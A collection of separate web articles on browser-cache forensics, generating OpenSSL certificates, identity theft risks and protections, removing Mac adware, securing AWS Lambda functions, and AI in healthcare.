(BHV) and Browser History Examiner
(BHE) we wanted to make this functionality easier to use and more reliable.
A great research paper on this topic from the University of Amsterdam in partnership with the Netherlands Forensic Institute is titled ‘Reconstructing web pages from browser cache
’. The research paper examined and tested the different methods of reconstructing a web page from the browser cache. Chapter 3.1 "Pre- or Post-processing" details the two methods available:Pre-processing
, occurs before the rendering browser has accessed the web page. It involves parsing all resource identifiers such as images, stylesheets, and scripts within the HTML document and updating their URLs to point to the local cached version. For example, the Google search results page includes the Google logo which is represented in the HTML document with the following image tag:<img width="167" height="410" alt="Google" src="/images/nav_logo242.png">
During pre-processing the cached image ‘nav_logo242.png
’ would be extracted from the browser cache, and the ‘src
’ URL would be updated to point to this local file.Post-processing
, occurs after the rendering browser has accessed the web page. It involves intercepting all HTTP requests for external resources from the rendering browser. If the requested resource is available within the browser cache then it is extracted and included in the response to the request. Post-processing therefore behaves in a similar manner to a proxy server.
The disadvantages of the pre-processing method are as follows:
1. It requires modifying a copy of the original evidence
3. Any resources identifiers which are not parsed may result in the original resources being downloaded over the internet
Through testing with a proof of concept the research paper concluded that "post-processing leads to more complete results without tampering with the evidence
The research paper also examined existing tools capable of reconstructing web pages and at the time of writing (July 2013), stated that they all used the pre-processing method. This included NetAnalysis (Digital Detective), Internet Examiner v3 (SiQuest) and our own tools FoxAnalysis and ChromeAnalysis.
During testing against existing tools the research paper stated that "comparing the results between this research and existing tools shows that the post-processing mechanism handles every resource request whereas pre-processing manages this only partly
When developing BHV and BHE we chose to implement the post-processing method of reconstructing web pages in order to ensure a more reliable process. We also made it easier to view rebuilt web pages by separating them into a 'Cached Web Pages' tab and embedding a web browser within the application. The web browser uses the WebKit
rendering engine and is therefore capable of displaying modern web sites.
To see our web page reconstruction in action visit our Downloads
page for a free trial of Browser History Examiner, or to grab our free forensic tool, Browser History Viewer. | <urn:uuid:e73b3a15-9ff0-421f-9a91-18b7e176be18> | CC-MAIN-2022-40 | https://www.foxtonforensics.com/blog/post/web-page-reconstruction-for-forensic-analysis | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00341.warc.gz | en | 0.892528 | 813 | 3.171875 | 3 |
OpenSSL has been one of the most widely used certificate management and generation pieces of software for much of modern computing.
OpenSSL can also be seen as a complicated piece of software with many options that are often compounded by the myriad of ways to configure and provision SSL certificates.
OpenSSL is usually included in most Linux distributions. In the case of Ubuntu, simply running apt install OpenSSL will ensure that you have the binary available and at the newest version. OpenSSL on Windows is a bit trickier as you need to install a pre-compiled binary to get started.
One such source providing pre-compiled OpenSSL binaries is the following site by SLProWeb. Offering both executables and MSI installations, the recommended end-user version is the Light x64 MSI installation. The default options are the easiest to get started.
Verify that the installation works by running the following command. Note that this command was run in the PowerShell environment (hence the & preceding the command).
& "C:\\Program Files\\OpenSSL-Win64\\bin\\openssl.exe" version
To make running this command easier, you can modify the path within PowerShell to include the executable $Env:Path = $Env:Path + ";C:\\Program Files\\OpenSSL-Win64\\bin"
Provisioning a Certificate
There are many different ways to generate certificates, but the use cases that usually come up are the following.
- Self-Signed Certificates
- Certificate Signing Requests (CSR)
- Checking Certificate Information
A common server operation is to generate a self-signed certificate. There are many reasons for doing this such as testing or encrypting communications between internal servers. The command below generates a private key and certificate
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:4096 -keyout private.key -out certificate.crt
Let's break down the various parameters to understand what is happening.
- req - Command passed to OpenSSL intended for creating and processing certificate requests usually in the PKCS#10 format.
- -x509 - This multipurpose command allows OpenSSL to sign the certificate somewhat like a certificate authority. X.509 refers to a digitally signed document according to RFC 5280.
- -sha256 - This is the hash to use when encrypting the certificate.
- -nodes - This command is for no DES, which means that the private key will not be password protected.
- -days - The number of days that the certificate will be valid.
- -newkey - The format of the key, in this case an RSA key with 4096 bit encryption.
- -keyout - The location to output the private key of the self-signed certificate.
- -out - The location to output the certificate file itself.
Once the certificate has been generated, we should verify that it is correct according to the parameters that we have set.
openssl x509 -in certificate.crt -text -noout
The parameters here are for checking an x509 type certificate. The combination allows the certificate to be output in a format that is more easily readable by a person.
- x509 - This is a multipurpose command, and when combined with the other parameters here, it is for retrieving information about the passed in the certificate.
- -in - The certificate that we are verifying.
- -text - Strips the text headers from the output.
- -noout - Needed not to output the encoded version of the certificate
Certificate Signing Request
The next most common use case of OpenSSL is to create certificate signing requests for requesting a certificate from a certificate authority that is trusted.
openssl req -new -newkey rsa:2048 -nodes -out request.csr -keyout private.key
Similar to the previous command to generate a self-signed certificate, this command generates a CSR. You will notice that the -x509, -sha256, and -days parameters are missing. By leaving those off, we are telling OpenSSL that another certificate authority will issue the certificate. In this case, we are leaving the -nodes option on to not prompt for a password with the private key.
To verify that the CSR is correct, we once again run a similar command but with an added parameter, -verify. This command will validate that the generated CSR is correct. This is a prudent step to take before submitting to a certificate authority.
openssl req -in request.csr -text -noout -verify
OpenSSL is a complex and powerful program. Although this article just scratches the surface of what can be done, these are common and important operations that are generally performed by system administrators. There is much more to learn, but with this as a starting point, an IT professional will have a great foundation to build on! | <urn:uuid:e01945aa-f62a-4547-9f22-c8010dca6229> | CC-MAIN-2022-40 | https://www.ipswitch.com/blog/how-to-use-openssl-to-generate-certificates | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00341.warc.gz | en | 0.892755 | 1,043 | 2.984375 | 3 |
The cyber world is changing, and it is crucial than ever to proactively protect yourselves from prying eyes. The technology-driven digitalization, proliferation of endpoints, and more remote access to data in this competitive world equal increased opportunities for tech-savvy attackers. Though identity theft is one of the oldest crimes, the attacking tools are becoming more sophisticated, and the attackers are out in force, enjoying an easy time stealing personal data. Attackers can effortlessly exploit endpoint vulnerabilities with new skimming technologies that can penetrate through the device’s window of exposure. The attacking methods used by criminals are plentiful, and they continue to evolve, making identity theft one of the fastest growing crime problem.
Untangling the mess from identity theft can be very challenging, and it can be difficult to spot early warning signs. Fraudsters take advantage of businesses as well as individuals. For corporations, remediating the problem can be a long and expensive task. So, it is vital to stay cautious of proposed identity thefts, and your vigilance starts with educating yourself on the most prevalent ways identity thieves get hold of your data. There are no ways to immunize yourself against identity theft completely. All you can do is to be well equipped to shield your personal data, know what identity thieves can do with your personal data and act swiftly if someone manages to thieve it.
What is meant by identity theft?
Identity theft is an offensive process that involves stealing the personal or financial information of an individual unwittingly, which is later used for fraudulent purposes. Usually, any Personally Identifiable Information that can be used to access a person’s financial resources like an individual’s name, date of birth, address, bank account number, credit card number, social security number, medical insurance account number, electronic signature, fingerprint, driver’s license number, passport number, PINs, and passwords can be compromised in identity theft. Identity theft is a very serious crime, and it can happen to anyone.
Identity thieves deliberately use the stolen identity for credits, merchandise, or financial gains in the name of other persons, and the victims sometimes might suffer adverse consequences that will rapidly spiral out of control as they are unknowingly held responsible for the perpetrator’s activities. The victim’s creditworthiness, reputation, and data privacy will be damaged due to any transactions or purchases made by the imposter, which costs them a massive sum of money, effort, and emotional distress. The thieves may sometimes provide the contents to a crime ring. It may take a single day to several months or years accompanied by constant investigations and long-term assistance to tie over the consequences.
How identity theft occurs?
Identity theft is committed in various ways. Due to the nature of the technologies used for identity theft, personal information is at risk anytime. Criminals are increasingly using computer technologies and becoming more creative in how they steal your identity. Understanding how identity theft occurs helps you better stay vigilant and identify what kind of data is to be protected. The techniques used range from mere shoulder surfing to high-end social engineering methods used to access corporate databases.
Identity theft methods:
- Shoulder surfing – Thieves discreetly gleans information when people fill out personal information on forms and peer over their shoulder when typing sensitive information like passwords on a keypad, credit card number on a phone or computer, and entering ATM PIN. They may also listen to the victim’s calls to steal their personal information. This usually occurs in crowded public places where observing others is comparatively easy.
- Mail theft – Thieves directly sift through the victim’s mailbox to access junk mails containing credit card bills, bank statements with the account number, tax form with a security number, or other documents containing personal information. Digging through trash mails to find receipts containing personal information is a very early method used for identity theft since long before the advent of the internet. Bank statements and credit card information sent through post can also be vulnerable to theft. Information can even be stolen from computer based public records.
- Malware – Malware or malicious software can be designed to steal essential data from the device on which it is installed or spy over the user’s online activities to steal their personal information. Malware like viruses, trojans, spyware, or keyloggers are commonly used for this, and they find open doors for the thieves to get their hands on the data residing on the system. Criminals sometimes hack devices in a network to access systems and databases to obtain personal information in bulk.
- Phishing – Phishing is a process where scammers use deceptive emails to trick people and steal sensitive information. Different forms of malware come attached to phishing emails, and sometimes links to fraudulent or spoof websites will also be attached where users are prompted to type in their personal information. Sometimes the victim will be tricked to fill a data collection form wherein their important personal information is disclosed. Phishing emails typically look like a legitimate one from a reputed source so that people easily fall victim. Rarely, the fishy email may contain spelling or grammatical mistakes, seems coming from unofficial email id, and include an urgent request. So, it isn’t easy to find them out. Scammers also use SMS text messages, phone calls, or other forms of electronic communication other than stealing or diverting mails to impersonate trusted organizations.
- Phone scams – Identity thieves directly make a call pretending that they are from a bank or other reputed firms and prompt users to share their bank account details and other personal information.
- Dumpster diving – Thieves sometimes sifts through garbage cans to get useful information. Retrieving people’s discarded file documents from trash dumpsters is an easy method used for identity theft. Pre-approved credit cards are often thrown unopened to garbage without proper shredding, which opens up an opportunity for credit card theft. Discarded checks, health insurance cards, and tax-related documents are other vital data that are accessed by rummaging through the rubbish.
- Wi-Fi hacking – Public Wi-Fi doesn’t properly encrypt the data flowing through it. So, having the Wi-Fi password with them, criminals can easily snoop on data traveling to and from other’s devices and intercept the personal information which people send through a public Wi-Fi network. Criminals sometimes create their own fake Wi-Fi hotspots in public places to attract people to use it and thereby easily get access to their devices. In other cases, attackers use different tools to hack other private Wi-Fi networks that are unencrypted and don’t have a VPN in use to stole data.
- Skimming – Skimming devices are placed over an ATM or card readers at a point-of-sale. Here the actual card reader is replaced by a counterfeit device that captures the data contained in the magnetic strips of debit cards or credit cards and shares them with the fraudsters. Sometimes a small camera will be attached to capture ATM PINs and ZIP codes.
- Card information cloning – The card readers copy the information contained in the magnetic strip of a debit or credit card and use a counterfeit card with the same details to make payments.
- Direct stealing – Identity thieves grab and go valuable data typically by pickpocketing or housebreaking. For instance, they may steal misplaced cheques to obtain bank code and account number.
- Insider theft – Insider job of identity theft in the workplace is a common challenge for organizations handling the personal information of their customers. Dishonest employees who have access to the database may intentionally steal customer data to hand it over to other fraudsters or sell it in the dark web marketplace.
- Data breach – Data breach is a steadily growing crime, and a portion of the data breach victims have their identities stolen as well. When some unauthorized ones gain access to a corporate’s sensitive data, customer data is one of the valuable information that could be easily stolen.
Get to know the warning signs for identity theft
It’s really frustrating that identity theft can remain unnoticed for a long time as thieves are clever and cunning in their operations. However, it is important to spot potential frauds before it becomes a major threat. Here are some warning signs which indicates that the identity has been stolen:
- Unknowing withdrawals from bank accounts
- Impacted credit score and inexplicable denial of credit in spite of having high credit rates
- Not receiving bills or other important emails containing sensitive data
- Receiving bills or payment reports for unknowing accounts
- Fake accounts and false charges on the credit report
- Rejection of health plans due to unknown reasons
- Unusual IRS notifications that multiple tax returns are filed under a person’s name or income data from an unknown employer
- A data breach on a company that stores the victim’s personal information
- Getting bills for strange purchases or credit card statements for unknowing sign ups
- Unauthorized bank transactions
- Denial of electronic tax filing
- Receiving authentication texts and emails from unknown accounts
- Getting bills for unrecognized healthcare benefits
- Getting unnecessary calls from debt collectors for overdue
- Job opportunities unexpectedly fall through after the prospective employer runs a credit check
Some recent statistics
Fraud Reports by Federal Trade Commission Customer Sentinel Network clearly shows a steady increase in the rate of identity theft in recent years.
Here is a quick overview of the identity thefts reported by subtype
|Theft subtype||2019 Q4||2020 Q1||2020 Q2||2020 Q3|
|Debit card, Electronic funds transfer, or ACH||6374||6832||8191||7660|
|Employment or wage-related fraud||4011||6158||7534||6714|
|Email or social media||2844||3029||3681||3800|
|Online shopping or payment account||3028||3343||3969||3903|
Different types of identity theft
Identity theft is a broad term which involves various forms, the most common among which are listed below:
- True-name identity theft – Fraudsters steal other person’s data and open new accounts or services in their name. They may establish a new cellular phone service, start a new credit card account, or open a new banking account to get blank checks.
- Account takeover identity theft – Fraudsters gain access to the victim’s existing account by means of the stolen identities. Once they get access to the victim’s account, they change the email address associated with it and make all transactions before the victim realizes the threat.
- Criminal identity theft – Fraudsters commit crimes and provide stolen identities to the police when they get arrested for disguising themselves as another individual. Criminals either submit government issued identity documents or a fake ID to prove themselves as the other individual. So, in police records, the identity theft victim will be charged, letting the actual culprit off the hook. Criminal identity theft can sometimes have a long-lasting effect that even when the victim can somehow manage to prove his innocence before the police and judiciary, they may encounter problems due to bad background in the future as some data aggregators may still have false criminal records in the victim’s name.
- Medical identity theft – Fraudsters steal medical information like health insurance information for receiving medical services or prescription drugs or to get access to the medical records of other people. All the fake details will be added to the victim’s account and the health insurance provider of the victim may receive unknown bills.
- Tax identity theft – Fraudsters files a tax return in someone else’s identity and nabs the refund, which is directly deposited to a bank account controlled by the thief. It is done by using the person’s name, address, and social security number. The victim may not know until they try to file a tax return.
- Social identity theft – Fraudsters use social media platforms for identity theft. They may befriend people in social media platforms and tricks them into sharing their personal information. Sometimes, the thieves go to the next level by creating a phony account in the name of other people and committing all the fraudulent activities from that account so that the victim will be blamed for any consequences.
- Child identity theft – Child identity theft is a form of identity theft that often remains unnoticed for a long time. Imposters steal minor’s identity, including social security numbers, when they do not have any data associated with them. Children’s information is misused to apply for bank accounts, establish a line of credit, receive government benefits, and take out loans.
- Senior identity theft – Senior identity theft is a form of identity theft that targets people over the age of 60. Senior may be unaware of the evolving techniques used by criminals and hence easily fall victim to such kind of attacks. To add, seniors are more likely to be in contact with medical care and health insurance units who stores a large amount of personal and financial information which makes them an attractive target for identity theft.
- Synthetic identity theft – In synthetic identity theft, fraudsters fabricate a new fake identity sometimes by combining the personally identifiable information of multiple identities which makes it the most difficult form of identity theft to track. This type of identity theft is more common in recent days, and the method may involve partial or complete fabrication.
- Financial identity theft – Any form of identity theft involves financial gains, and financial identity theft can be said a part of any other identity theft attempts. Financial theft is when the stolen identity is solely used for monetary gains like payment fraud, credit card fraud, new bank account openings, taking loans, and getting goods and services claiming to be someone else.
Impacts of identity theft
Identity thieves can benefit from personal information in a variety of ways. Though businesses are far more tempting targets for identity thefts than independent individuals, both individuals as well as businesses are equally likely to have harming repercussions following identity theft. Identity theft can brought in immediate financial loss or gradual damage to the credit status of the victim depending on the type of the data stolen and the way by which the thieves utilizes the stolen data. Technology has exacerbated the identity theft problem that only a victim could understand how devasting the effect can be both economically and emotionally.
Some serious aftereffects of identity theft:
- Criminals use stolen employee identification numbers to submit false income and withholding documents to get refunds.
- In the first place, victims probably get little to no assistance from the authority which has issued the identity document.
- There are so many identity fraud cases reporting that it is less likely to get immediate investigation assistance from law enforcement.
- In order to prove their innocence to the authorities, victims may often have to show the police report.
- Flagging the credit report for fraud may not always stop fraudsters from obtaining more credit.
- Victims must deal with abusive collection agencies.
- Businesses have to spend a significant amount of time cleaning up the mess from identity theft.
- Individuals, as well as organizations, suffer huge financial loses.
- Sometimes the thief may commit a crime in the victim’s name and the entire burden of those crimes falls on the shoulders of the victim.
- Attackers purchase items, spend money from the victim’s account, and even steal the superannuation of employees.
- Thieves may change the victim’s password and contact information for accounts, making the victims unable to recover their account.
- Stolen information sometimes ends up on the dark web, which makes the situation even worse.
- Attackers access the victim’s social media accounts to target their family and friends for the next session.
- Identity thieves take out the victim’s phone plans and other contracts.
Identity theft protection
The public often learns of a problem only when they spot the worst. Lack of proper cyber hygiene is a major cause for most of the high-profile identity theft cases. A proactive, defense-in-depth security approach in place is the key to protect yourself from the all-too-common occurrence of identity theft and to mitigate the risks caused by it. Here is a compiled list of some of the most effective countermeasures that individuals, as well as organizations alike, can adopt to defend a possible identity theft:
- Businesses should use an identity and access management solution
Whether you are a big, small, or medium-sized organization, adopting an IAM (Identity and Access Management) solution is vital than any other well-known security practices to prevent the identified vulnerabilities and exposure. Identity and access management offers tools and policies to manage identities and control user access within an organization. This ensures that only authorized users within the organization are accessing sensitive data.
Most IAM solutions offer role-based access control with additional authentication options like single-sign-on and multi-factor or two-factor authentication. IAM also involves basic security etiquettes like enforcement of password and maintaining proper password hygiene, mandating the use of VPN, data encryption, compliance checks, virtual containerization of work data, and remote monitoring.
With the use of IAM, organizations can eliminate the instances of identity theft by preventing the spread of compromised login credentials and avoiding malicious entry to the organization network. The best option is to go with a UEM (Unified Endpoint Management) solution that offers a harmonized set of security services apart from the identity and access management, which altogether can employ a multi-layer threat defense.
- Monitor credit activity and financial statements
Many banks offer continuous credit card monitoring for its customers. Customers should take advantage of this and bank statements should be scanned for purchases that seem unusual.
- Nurture and practice good cybersecurity hygiene
Think before responding to emails from unfamiliar sources and be on alert while opening email attachments. Never share personal information to unauthorized websites. Use only secure websites.
- Shred important documents
Dumped hard copies of documents are the most underrated attack vector used by identity thieves. Be sure to shred all the important identity documents once you discard them after use.
- Be cautious on social media
Always set social media account to private. Be extremely careful when making new friends on social media platforms and be wary of the personal data you share there.
- Avoid carrying Social Security Card around
- Avoid the use of public Wi-Fi, especially while making online transactions. Avoid sharing sensitive information online if possible.
- Wipe all personal information or make the hard drive unreadable before dispensing old computer and mobile devices.
- Check state and national criminal databases to confirm you don’t have any unknown criminal cases reported in your name.
- Keep photocopies of credit cards, debit cards, and all other personal information so that even if they are stolen, you’ll have all the data readily available.
- Organizations should provide awareness to employees to easily identify threat patterns and practices.
If you suspect or are particularly worried about identify theft, immediately freeze your accounts, change your passwords, and report it to the authorities. Organizations should red-flag to let the customers know that their data has been compromised. | <urn:uuid:c5373a4c-d155-46ef-8de5-849b85a2fec6> | CC-MAIN-2022-40 | https://www.hexnode.com/blogs/identity-theft-how-to-not-be-the-next-victim/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00541.warc.gz | en | 0.916312 | 3,974 | 2.6875 | 3 |
In addition to other operating systems that is being targeted by threats, Mac computers are also subject to malicious software attacks. Ad-supported or notorious adware software has been infecting Mac computers. Lots of adware apps are spreading to inject misleading ads and pop-ups in order to generate online revenue. An example of advertising software that infects Mac computers is called AccessDefault. The installation of this adware will negatively affect the operation of Mac computer and its browser application.
Is AccessDefault app harmful?
AccessDefault is some kind of harmful adware program running to flood the browser with aggressive ads and annoying pop-ups and redirects. Advertisements are persistently shown on the internet application while Mac users are surfing the internet. Continuous occurrences of ads and pop-ups can make browsing slow. Such a case will cause Mac users to be distracted while doing their online browsing. Furthermore, AccessDefault may inflict browser redirects leading the pages to questionable sites.
The impact of AccessDefault on Mac computers may not be a big issue as compared to virus infections. However, AccessDefault presence may cause Mac computers to be open to other malware contamination. It may install additional programs or extensions onto Mac computers that might cause further damages. Mac users should avoid installing AccessDefault on their Mac computers in order to prevent any potential hazards. One other thing, scanning the system with updated antivirus software is a good idea to delete AccessDefault from compromised Mac computers.
How AccessDefault adware enters Mac?
In some instances, AccessDefault’s entry on Mac computers are rather strange. The reason is, this unusual browser extension typically gets into Mac computers without permission from Mac users. This is likely due to installation of other malicious programs. There are downloadable software, which automatically involve additional apps during the setup process. Mac users should closely inspect the entire installation procedure to detect unwanted applications that attempt to invade Mac OS. Furthermore, Mac users must be careful about which software to install; it may include AccessDefault or any other malware.
Procedures to Remove AccessDefault from Mac
This area contains comprehensive procedures to help you remove adware and potentially unwanted program from the computer.
Guide on this page are written in a manner that can be easily understand and execute by Mac users.
Quick Fix - Scan the Mac Computer with Combo Cleaner
Combo Cleaner is a trusted Mac utility application with complete antivirus and optimization features. It is useful in dealing with adware, malware, and PUP's. Moreover, it can get rid of adware like AccessDefault. You may need to purchase full version if you require to maximize its premium features.
1. Download the tool from the following page:
2. Double-click the downloaded file and proceed with the installation.
3. In the opened window, drag and drop the Combo Cleaner icon onto your Applications folder icon.
4. Open your Launchpad and click on the Combo Cleaner icon.
5. Wait until antivirus downloads its latest virus definition updates and click on "Start Combo Scan" to start removing AccessDefault.
6. Free features of Combo Cleaner include Disk Cleaner, Big Files finder, Duplicate files finder, and Uninstaller. To use antivirus and privacy scanner, users have to upgrade to a premium version.
Proceed with the rest of the removal steps if you are comfortable in manually removing malicious objects associated with the threat.
Step 1 : Delete AccessDefault from Mac Applications
1. Go to Finder.
2. On the menu, click Go and then, select Applications from the list to open Applications Folder.
3. Find AccessDefault or any unwanted program.
4. Drag AccessDefault to Trash Bin to delete the application from Mac.
5. Right-click on Trash icon and click on Empty Trash.
Step 2 : Remove Browser Extensions that belongs to AccessDefault
1. Locate the add-on or extension that is relevant to the adware. To do this, please follow the following depending on affected browser.
Safari - Choose Preferences from the Safari menu, then click the Extensions icon. This will open a window showing all installed extensions.
Chrome - Select Preferences from the Chrome menu, and then click the Extensions link found on the left pane.
Firefox - Choose Add-ons from the Menu. Look at both the Extensions and Plug-ins lists when it opens a new window.
2. Once you have located AccessDefault, click on Remove or Uninstall, to get rid of it.
3. Close the browser and proceed to the next steps.
Step 3 : Delete Malicious Files that have installed AccessDefault
1. Select and copy the string below to your Clipboard by pressing Command + C on your keyboard.
2. Go to your Finder. From the menu bar please select Go > Go to Folder...
3. Press Command + V on your keyboard to paste the copied string. Press Return to go to the said folder.
4. You will now see a folder named LaunchAgents. Take note of the following files inside the folder:
The term unknown is just a representation of the actual malware name. Attackers may masks the actual name with following:
- AccessDefault Daemon
If you cannot find the specified file, please look for any unfamiliar or suspicious entries. It may be the one causing AccessDefault to be present on your Mac. Arranging all items to see the most latest ones may also help you identify recently installed unfamiliar files. Please press Option + Command + 4 on your keyboard to arrange the application list in chronological order.
Important: Take note of all the suspicious files as you may also delete the same item on another folder as we go on.
5. Drag all suspicious files that you may find to Trash.
6. Please restart the computer.
7. Open another folder using the same method as above. Copy and Paste the following string to easily locate the folder.
8. Look for any suspicious items that are similar to the ones in Step 4. Drag them to the Trash.
9. Repeat the process on the following non-hidden folders (without ~):
10. Lastly, go to your Finder and open the Applications Folder. Look for subfolders with the following names and drag them to Trash.
- AccessDefault Daemon
Optional : For locked files that cannot be removed, do the following:
1. Go to Launchpad, Utilities folder, open Activity Monitor.
2. Select the process you want to quit.
3. Click on Force Quit button.
4. You may now delete or remove locked files that belongs to AccessDefault adware.
Step 4 : Double-check with MBAM Tool for Mac
1. Download Malwarebytes Anti-malware for Mac from this link:
2. Run Malwarebytes Anti-malware for Mac. It will check for updates and download if most recent version is available. This is necessary in finding recent malware threats including AccessDefault.
3. If it prompts to close all running web browser, please do so. Thus, we advise you to PRINT this guide for your reference before going offline.
4. Once it opens the user interface, please click on Scan button to start scanning your Mac computer.
5. After the scan, Malwarebytes Anti-malware for Mac will display a list of identified threats, AccessDefault is surely part of it. Be sure to select all items in the list. Then, click Remove button to clean the computer.
Step 5 : Remove AccessDefault from Homepage and Search
- Open your Safari browser.
- Go to Safari Menu located on upper left hand corner, and then select Preferences.
- Under General tab, navigate to Default Search Engine section and select Google or any valid search engine.
- Next, be sure that "New Windows Open With" field is set to Homepage.
- Lastly, remove AccessDefault from the Homepage field. Replace it with your preferred URL to be set as your default homepage.
- Open Chrome browser.
- Type the following on the address bar and press Enter on keyboard : chrome://settings/
- Look for 'On Startup' area.
- Select 'Open a specific page or set of pages'.
- Click on More Actions and select Edit.
- Enter the desired web address as your home page, replacing AccessDefault. Click Save.
- To set default search engine, go to Search Engine area.
- Click on 'Manage search engines...' button.
- Go to questionable Search Engine. Click on More Actions and Click 'Remove from list'.
- Go back to Search Engine area and choose valid entry from Search engine used in the address bar.
- Run Mozilla Firefox browser.
- Type the following on the address bar and hit Enter on keyboard : about:preferences
- On Startup area, select 'Show your home page' under 'When Firefox starts' field.
- Under Home Page field, type the desired URL to replace AccessDefault settings.
- To configure default search engine, select Search on left sidebar to display settings.
- Under Default Search Engine list, please select one.
- On the same page, you have an option to Remove unwanted search engine.
Optional : If unable to change browser settings, execute these steps:
Some user complains that there is no way to change browser settings because it is grayed out by AccessDefault. In such situation, it is important to check if there is unwanted profile. Please do the following:
1. Quit any running applications and launch System Preferences from your Dock.
2. Under System Preferences, click Profiles.
3. Select AccessDefault or any relevant profile from the left pane. See image below.
4. At the bottom of this window, click minus [-] button to delete the account. Please refer to image above.
5. Close the Profiles window and open the affected browser to change all settings associated with AccessDefault. | <urn:uuid:4a9e9e6b-23b1-4a89-9297-fc28924a2a4c> | CC-MAIN-2022-40 | https://malwarefixes.com/remove-accessdefault/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00541.warc.gz | en | 0.824902 | 2,128 | 2.515625 | 3 |
We’re hearing more and more about services that are not based on traditional server models, such as Amazon S3 buckets—basically big buckets of storage in the cloud, and the concept of serverless computing. The good thing about what are now considered serverless services, like AWS Lambda, is that they allow developers to write and run code to deliver any type of application, functionality or backend service, with zero administration, and without having infrastructure or platforms to worry about.
AWS lambda is among the services that falls under the compute domain of the services AWS provides, along with Amazon EC2, EBS and Elastic Load Balancing.
So how does serverless work in the real world?
A serverless application can use several cloud services to do things such as serve website content from a storage bucket, authenticate users, and handle backend calls via a server-less lambda function that accesses data stored in a relational database.
While this example is based on the AWS platform, there are similarities in other platforms such as Microsoft Azure and Google Cloud.
As you can see, this so called serverless application isn’t really serverless, as it still has traditional server-based components, in this case a database server instance. Since serverless is usually stateless, the application needs a place to store its data, and that could be Amazon Elasticache, S3 storage, or databases such as RDS.
Based on the previous application example, let’s take a look at some of the potential vulnerabilities that could be leaving your organization exposed, along with some security considerations for your serverless application.
What are the Risks to Misconfigured AWS Lambda Functions?
- Limited or No Visibility into the Inventory of Your AWS Lambda Functions: If you do not have comprehensive visibility into your inventory, you cannot identify any publicly accessible Lambda functions, which means you cannot protect them.
- Without the ability to answer key questions you will not be able to spot malicious activity nor respond effectively to incidents: How many functions do you have? Are they new functions? Should they be there? What region are they in? What AWS Identity and Access Management (IAM) role are they using?
- Assigning Admin Permissions to Your Functions: Without assigning the right execution role, you cannot control the privileges assigned to your Lambda function. If you are providing administrative permissions you may be granting the role more permissions than the function really needs.
- Multiple Functions Sharing Same Execution Role: Using an AWS IAM execution role with more than one Lambda function will violate the Principle of Least Privilege (POLP). Without the right IAM execution role you cannot control the privileges that your Lambda function has.
- Tracing Not Enabled: If you are not enabling tracing through AWS X-Ray, you will not have visibility into, nor monitoring capabilities for, your AWS Lambda functions.
How Halo Can Help
CloudPassage Halo Cloud Secure monitors AWS Lambda functions to ensure they are properly configured and to make sure that their activity is tracked so any unusual activity can be fully understood. Halo also monitors the permissions the Lambda functions operate under to ensure minimum necessary access for specific functions.
- Identify any publicly accessible AWS Lambda functions and update their access policy in order to protect against unauthorized users that are sending requests to invoke these functions.
- Allowing anonymous users to invoke your AWS Lambda functions is considered bad practice and can lead to data exposure, data loss and unexpected charges on your AWS bill. To prevent any unauthorized invocation requests to your Lambda functions, restrict access only to trusted entities by implementing the appropriate permission policies.
- Ensure that your Amazon Lambda functions do not have administrative permissions (i.e. access to all AWS actions and resources) in order to promote the Principle of Least Privilege and provide your functions the minimum amount of access required to perform their tasks.
- The permissions assumed by an AWS Lambda function are determined by the IAM execution role associated with the function. With the right execution role, you can control the privileges that your Lambda function provisions. Instead of providing administrative permissions you should grant the role the necessary permissions that your function really needs.
- Ensure Your Amazon Lambda functions do not share the same AWS IAM execution role in order to promote the POLP by providing each individual function the minimal amount of access required to perform its tasks. There should always be a one-to-one relationship between your AWS Lambda functions and their IAM roles, meaning that each Lambda function should have its own IAM execution role and should, therefore, not be shared between functions.
- The permissions assumed by an AWS Lambda function are determined by the IAM execution role associated with that function, which is why using the same IAM role with more than one Lambda function will violate the Principle of Least Privilege. By using the right IAM execution role, you can control the privileges that your Lambda function has, thus instead of providing full or generic permissions you should only grant each execution the permissions that your function really needs.
- Ensure that tracing is enabled for your AWS Lambda functions in order to gain visibility into the function’s execution and performance. With the tracing feature enabled, Amazon activates Lambda support for AWS X-Ray, a service that collects data about requests that your functions perform, and provides tools you can use to view, filter and gain insights into the collected data to identify issues as well as opportunities for optimization.
- With tracing mode enabled, you can save time and effort debugging and operating your functions as the X-Ray service support allows you to rapidly diagnose errors, identify bottlenecks, slowdowns and timeouts by breaking down the latency for your Lambda functions.
Learn more about how Halo Cloud Secure can give you security visibility into your inventory of your AWS Lambda functions and help you identify any that may be publicly accessible. Request a customized demo. | <urn:uuid:53db2b97-8199-4ab8-b1e7-ef487bee43fc> | CC-MAIN-2022-40 | https://fidelissecurity.com/threatgeek/archive/best-practices-for-securing-aws-lambda/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00541.warc.gz | en | 0.906693 | 1,219 | 2.546875 | 3 |
The product of human judgment and scientific evidence has always been a part of healthcare. Artificial intelligence (AI) advancements are bringing those two aspects closer together than ever before, and the business is feeling the effects. Data-based artificial intelligence is defined as computer systems capable of performing activities that normally require human intelligence. It examines massive volumes of data utilizing algorithms to learn how to complete jobs without even being explicitly programmed.
As AI in healthcare shows to be a vital component in diagnosis, therapy, care delivery, results, and cost, this capability is causing waves of change. Medical research has advanced rapidly, increasing the lifespan around the world. However, as people live longer, healthcare systems face increased demand, rising expenses, and a staff that is straining to meet the requirements of their patients. Population aging, shifting patients’ needs, a change in lifestyle decisions, and the never-ending cycle of innovation are just a few of the inescapable forces that are driving such a demand. An aging population’s ramifications stand out among these. By 2050, one in every four people in Europe and America will be over 65, putting a strain on healthcare systems. Treating such patients is costly, and it necessitates a shift in system philosophy from episodic to continuous care.
